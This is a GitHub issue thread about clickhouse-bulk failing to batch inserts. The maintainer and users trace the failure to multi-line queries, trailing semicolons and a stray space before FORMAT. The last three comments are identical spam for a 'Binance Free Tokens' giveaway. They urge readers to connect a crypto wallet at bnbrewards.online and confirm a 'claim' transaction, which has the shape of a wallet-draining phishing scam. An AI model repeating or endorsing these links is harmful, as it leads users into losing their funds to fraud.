### ISSUE TITLE
Bulk inserting is not working

### ISSUE THREAD

**Issue by th0th** [nikepan/clickhouse-bulk#15]
Hi, first of all, thank your making clickhouse-bulk 💐

I am running with this config

```json
{
  "listen": ":8125",
  "flush_count": 10000,
  "flush_interval": 3000,
  "debug": true,
  "dump_dir": "dumps",
  "clickhouse": {
    "down_timeout": 300,
    "servers": [
      "http://127.0.0.1:8123"
    ]
  }
}
```

Shouldn't this config collect and insert incoming requests in every 3 seconds, in bulk? I am watching logs and seeing every insert I send via HTTP (I am doing insert by python's `requests`) being processed immediately as I send. What am I doing wrong?

**Comment by nikepan** [comment]
it's intresting. I will write test for it. Thanks.

**Comment by th0th** [comment]
Is there anything I can provide to help you reproduce? I tried both the docker image and binary on GNU/Linux (alpine). I also tried environment variable configuration on docker image. Result didn't change.

**Comment by nikepan** [comment]
Are you sent insert or select queries? if insert, to same table or different?

**Comment by th0th** [comment]
Hey @nikepan, my code is like this:


```python
import requests


query = """
    INSERT INTO table
    (field1, field 2)
    VALUES
    ('{field1}', '{field2}');
    """.format(
        field1=field1,
        field2=field2,
    )

requests.post(
    url='http://clickhouse-bulk-url',
    params={
        'query': query,
    },
)
```

I have many workers on different servers/docker containers doing the same thing, my expectation was `clickhouse-bulk` to collect multiple incoming inserts in memory and then actually insert to the table in bulks.

**Comment by nikepan** [comment]
Yes, I catched bug. I dont know, how it works.  I will publish new version soon. With all works fine and auto resend dumps. Thank you!

**Comment by th0th** [comment]
Thanks, looking forward to the new release! Do you have a date in mind?

**Comment by nikepan** [comment]
It's because you send multi line query. At now clickhouse-bulk supports only single line queries. I try to fix in next release

**Comment by th0th** [comment]
> It's because you send multi line query. At now clickhouse-bulk supports only single line queries. I try to fix in next release

Oh interesting. Would it work if I just replace `\n` s with space then?

**Comment by nikepan** [comment]
Yes, i checked it:
query = "INSERT INTO table (field1, field 2) VALUES ('{field1}', '{field2}');".format(
        field1='f1',
        field2='f2',
)
⇨ http server started on [::]:8124
2019/10/15 21:52:40 send 3 rows to http://127.0.0.1:8123 of query=INSERT+INTO+table+%28field1%2C+field+2%29+VALUES
2019/10/15 21:52:42 Send ERROR 502: No working clickhouse server

**Comment by th0th** [comment]
Awesome! I can go with that workaround until you release the new version then, thanks a lot @nikepan!

**Comment by th0th** [comment]
I think I did hit another possible bug. I converted my multiline inserts to single-line ones.

And even I see this log

```
2019/10/15 21:22:08 send 11 rows to http://clickhouse:8123 of query=...
```

I still see a single row being inserted into the actual table.

**Comment by nikepan** [comment]
I need example of your request. Rows calculated by \n char

**Comment by th0th** [comment]
Here is the code:

```python

import requests


query = "INSERT INTO data (id, date_time, item_id, is_successful, detail, time1, time2, time3, time4, time5, time6, time7) VALUES ('bf58a4af-0e56-4e07-91d9-bbf70917e0da', '2019-10-15 21:36:43', 10, 1, 'OK', 8, 49, 99, 99, 222, 0, 377);"

requests.post(
    url='http://clickhouse-bulk-url',
    params={
        'query': query,
    },
)
```

**Comment by th0th** [comment]
A testable example:

```python
import requests


query = "INSERT INTO data (id, date_time, item_id, is_successful, detail, time1, time2, time3, time4, time5, time6, time7) VALUES ('bf58a4af-0e56-4e07-91d9-bbf70917e0da', '2019-10-15 21:36:43', 10, 1, 'OK', 8, 49, 99, 99, 222, 0, 377);"

for i in range(10):
  requests.post(
      url='http://clickhouse-bulk-url',
      params={
          'query': query,
      },
  )
```

Here is the log:

```
2019/10/15 21:45:28 send 10 rows to http://clickhouse:8123 of query=...
```

And I see 1 row inserted into the database.

**Comment by nikepan** [comment]
you need remove ";" at end of line. It bug too) Thanks for report

**Comment by nikepan** [comment]
clickhouse-bulk for speed parse strings simply and not support many variations)

**Comment by a1tus** [comment]
@nikepan, hello. It seems like we've faced this issue too.
Can you clarify, is it fixed in v1.2.*? It's released after your comments here but there's no info about it in changelog.

**Comment by nikepan** [comment]
> Can you clarify, is it fixed in v1.2.*? It's released after your comments here but there's no info about it in changelog.
No, it does not fixed. I found some troubles for this changes. I will try fix it later, but not now.

**Comment by a1tus** [comment]
Ok, thanks, at least now we know status exactly :)

**Comment by rsurgiewicz** [comment]
Hello
Are those issues fixed in latest docker image?
I'm trying to use the tool but despite

> CLICKHOUSE_FLUSH_INTERVAL=10000

I'm getting 
`Inserted 1 row ....`

My inserts goes from external system and it's using JSONEachRow to 3 tables.
Is this case supposed to work or shall I have a separate instance of bulk per each table?

BTW. Is there any Dockerfile to build image with latest code from your repo?
Thanks!

**Comment by rsurgiewicz** [comment]
Ok nailed it!
There was an extra space before FORMAT keyword.
After removing it, batch inserts work!

**Comment by shokry055** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by shokry055** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by thulbahri** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
